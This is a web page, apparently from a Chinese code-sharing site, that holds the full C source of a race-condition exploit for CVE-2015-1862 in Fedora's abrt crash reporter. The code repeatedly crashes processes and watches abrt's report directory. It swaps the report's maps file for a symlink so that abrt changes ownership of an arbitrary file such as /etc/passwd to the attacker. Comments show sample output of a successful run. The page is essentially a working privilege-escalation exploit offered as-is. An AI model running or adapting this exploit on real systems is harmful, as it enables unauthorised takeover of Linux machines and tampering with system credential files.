扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 |
#include <stdlib.h> #include <unistd.h> #include <stdbool.h> #include <stdio.h> #include <signal.h> #include <err.h> #include <string.h> #include <alloca.h> #include <limits.h> #include <sys/inotify.h> #include <sys/prctl.h> #include <sys/types.h> #include <sys/types.h> #include <sys/wait.h> #include <sys/stat.h> // // This is a race condition exploit for CVE-2015-1862, targeting Fedora. // // Note: It can take a few minutes to win the race condition. // // -- taviso@cmpxchg8b.com, April 2015. // // $ cat /etc/fedora-release // Fedora release 21 (Twenty One) // $ ./a.out /etc/passwd // [ wait a few minutes ] // Detected ccpp-2015-04-13-21:54:43-14183.new, attempting to race... // Didn't win, trying again! // Detected ccpp-2015-04-13-21:54:43-14186.new, attempting to race... // Didn't win, trying again! // Detected ccpp-2015-04-13-21:54:43-14191.new, attempting to race... // Didn't win, trying again! // Detected ccpp-2015-04-13-21:54:43-14195.new, attempting to race... // Didn't win, trying again! // Detected ccpp-2015-04-13-21:54:43-14198.new, attempting to race... // Exploit successful... // -rw-r--r--. 1 taviso abrt 1751 Sep 262014 /etc/passwd // static const char kAbrtPrefix[] = "/var/tmp/abrt/"; static const size_t kMaxEventBuf = 8192; static const size_t kUnlinkAttempts = 8192 * 2; static const int kCrashDelay = 10000; static pid_t create_abrt_events(const char *name); int main(int argc, char **argv) { int fd, i; int watch; pid_t child; struct stat statbuf; struct inotify_event *ev; char *eventbuf = alloca(kMaxEventBuf); ssize_t size; // First argument is the filename user wants us to chown(). if (argc != 2) { errx(EXIT_FAILURE, "please specify filename to chown (e.g. /etc/passwd)"); } // This is required as we need to make different comm names to avoid // triggering abrt rate limiting, so we fork()/execve() different names. if (strcmp(argv[1], "crash") == 0) { __builtin_trap(); } // Setup inotify, and add a watch on the abrt directory. if ((fd = inotify_init()) < 0) { err(EXIT_FAILURE, "unable to initialize inotify"); } if ((watch = inotify_add_watch(fd, kAbrtPrefix, IN_CREATE)) < 0) { err(EXIT_FAILURE, "failed to create new watch descriptor"); } // Start causing crashes so that abrt generates reports. if ((child = create_abrt_events(*argv)) == -1) { err(EXIT_FAILURE, "failed to generate abrt reports"); } // Now start processing inotify events. while ((size = read(fd, eventbuf, kMaxEventBuf)) > 0) { // We can receive multiple events per read, so check each one. for (ev = eventbuf; ev < eventbuf + size; ev = &ev->name[ev->len]) { char dirname[NAME_MAX]; char mapsname[NAME_MAX]; char command[1024]; // If this is a new ccpp report, we can start trying to race it. if (strncmp(ev->name, "ccpp", 4) != 0) { continue; } // Construct pathnames. strncpy(dirname, kAbrtPrefix, sizeof dirname); strncat(dirname, ev->name, sizeof dirname); strncpy(mapsname, dirname, sizeof dirname); strncat(mapsname, "/maps", sizeof mapsname); fprintf(stderr, "Detected %s, attempting to race...\n", ev->name); // Check if we need to wait for the next event or not. while (access(dirname, F_OK) == 0) { for (i = 0; i < kUnlinkAttempts; i++) { // We need to unlink() and symlink() the file to win. if (unlink(mapsname) != 0) { continue; } // We won the first race, now attempt to win the // second race.... if (symlink(argv[1], mapsname) != 0) { break; } // This looks good, but doesn't mean we won, it's possible // chown() might have happened while the file was unlinked. // // Give it a few microseconds to run chown()...just in case // we did win. usleep(10); if (stat(argv[1], &statbuf) != 0) { errx(EXIT_FAILURE, "unable to stat target file %s", argv[1]); } if (statbuf.st_uid != getuid()) { break; } fprintf(stderr, "\tExploit successful...\n"); // We're the new owner, run ls -l to show user. sprintf(command, "ls -l %s", argv[1]); system(command); return EXIT_SUCCESS; } } fprintf(stderr, "\tDidn't win, trying again!\n"); } } err(EXIT_FAILURE, "failed to read inotify event"); } // This routine attempts to generate new abrt events. We can't just crash, // because abrt sanely tries to rate limit report creation, so we need a new // comm name for each crash. static pid_t create_abrt_events(const char *name) { char *newname; int status; pid_t child, pid; // Create a child process to generate events. if ((child = fork()) != 0) return child; // Make sure we stop when parent dies. prctl(PR_SET_PDEATHSIG, SIGKILL); while (true) { // Choose a new unused filename newname = tmpnam(0); // Make sure we're not too fast. usleep(kCrashDelay); // Create a new crashing subprocess. if ((pid = fork()) == 0) { if (link(name, newname) != 0) { err(EXIT_FAILURE, "failed to create a new exename"); } // Execute crashing process. execl(newname, newname, "crash", NULL); // This should always work. err(EXIT_FAILURE, "unexpected execve failure"); } // Reap crashed subprocess. if (waitpid(pid, &status, 0) != pid) { err(EXIT_FAILURE, "waitpid failure"); } // Clean up the temporary name. if (unlink(newname) != 0) { err(EXIT_FAILURE, "failed to clean up"); } // Make sure it crashed as expected. if (!WIFSIGNALED(status)) { errx(EXIT_FAILURE, "something went wrong"); } } return child; } |
体验盒子
